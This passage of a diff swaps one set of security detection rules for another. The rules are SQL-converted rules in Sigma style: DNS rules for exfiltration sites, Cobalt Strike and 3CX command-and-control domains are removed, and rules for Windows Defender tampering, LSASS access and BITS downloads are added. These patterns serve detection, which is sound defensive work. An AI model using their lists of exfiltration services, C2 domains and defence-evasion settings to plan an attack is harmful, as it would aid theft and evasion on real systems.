'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\uus\\\\%' ESCAPE '\\')) OR (ProcessId = '4') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName IN ('System', 'Registry')) OR (NewProcessName LIKE '%\\\\Keybase\\\\upd.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SystemApps\\\\Microsoft.Windows.StartMenuExperienceHost%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\StartMenuExperienceHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\WindowsUpdateBox.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\resources\\\\app\\\\git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\HostMetadata\\\\NVMEHostmetadata.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Executables\\\\SSDUpdate.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", + "title": "Windows Defender Malware Detection History Deletion", + "id": "2afe6582-e149-11ea-87d0-0242ac130003", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", + "author": "Cian Heasley", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Deletion of Defender malware detections history for legitimate reasons" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1013')" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_defender_history_delete.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", + "description": "Detects the restoration of files from the defender quarantine", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_threat.yml" }, { - "title": "Suspicious LDAP Domain Access", - "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", - "status": "experimental", - "description": "Detect suspicious LDAP request from non-Windows application", - "author": "frack113", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Programs that also lookup the observed domain" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "dns_query_win_susp_ldap.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", - "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "title": "Windows Defender Exclusions Added", + "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "status": "stable", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_exclusions.yml" }, { - "title": "Suspicious DNS Query for IP Lookup Service APIs", - "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", - "status": "test", - "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", - "author": "Brandon George (blog post), Thomas Patzke (rule)", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "status": "experimental", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.t1590" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of ip lookup services such as ipify API" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName IN ('canireachthe.net', 'ipv4.icanhazip.com', 'ip.anysrc.net', 'edns.ip-api.com', 'wtfismyip.com', 'checkip.dyndns.org', 'api.2ip.ua', 'icanhazip.com', 'api.ipify.org', 'ip-api.com', 'checkip.amazonaws.com', 'ipecho.net', 'ipinfo.io', 'ipv4bot.whatismyipaddress.com', 'freegeoip.app', 'ifconfig.me', 'ipwho.is') AND NOT ((NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" ], - "filename": "dns_query_win_susp_ipify.yml" + "filename": "win_defender_exploit_guard_tamper.yml" }, { - "title": "DNS Query To Remote Access Software Domain", - "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113, Connor Martin", + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the software mentioned above" + "Administrator might try to disable defender features during testing (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "dns_query_win_remote_access_software_domains.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "Suspicious TeamViewer Domain Access", - "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", - "status": "test", - "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown binary names of TeamViewer", - "Other programs that also lookup the observed domain" + "Administrator activity (must be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (NewProcessName LIKE '%TeamViewer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "dns_query_win_susp_teamviewer.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", + "title": "BITS Transfer Job Downloading File Potential Suspicious Extension", + "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "description": "Detects new BITS transfer job saving local files with potential suspicious extensions", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.hta' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.psd1' ESCAPE '\\' OR LocalName LIKE '%.sh' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT ((LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\')))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_bits_client_new_transfer_saving_susp_extensions.yml" }, { - "title": "AppX Package Installation Attempts Via AppInstaller", - "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "title": "New BITS Job Created Via Bitsadmin", + "id": "1ff315dc-2a3a-4b71-8dde-873818d25d39", "status": "test", - "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", + "description": "Detects the creation of a new bits job by Bitsadmin", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "Many legitimate applications or scripts could leverage \"bitsadmin\". This event is best correlated with EID 16403 via the JobID field" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND processPath LIKE '%\\\\bitsadmin.exe' ESCAPE '\\')" ], - "filename": "dns_query_win_lolbin_appinstaller.yml" + "filename": "win_bits_client_new_job_via_bitsadmin.yml" }, { - 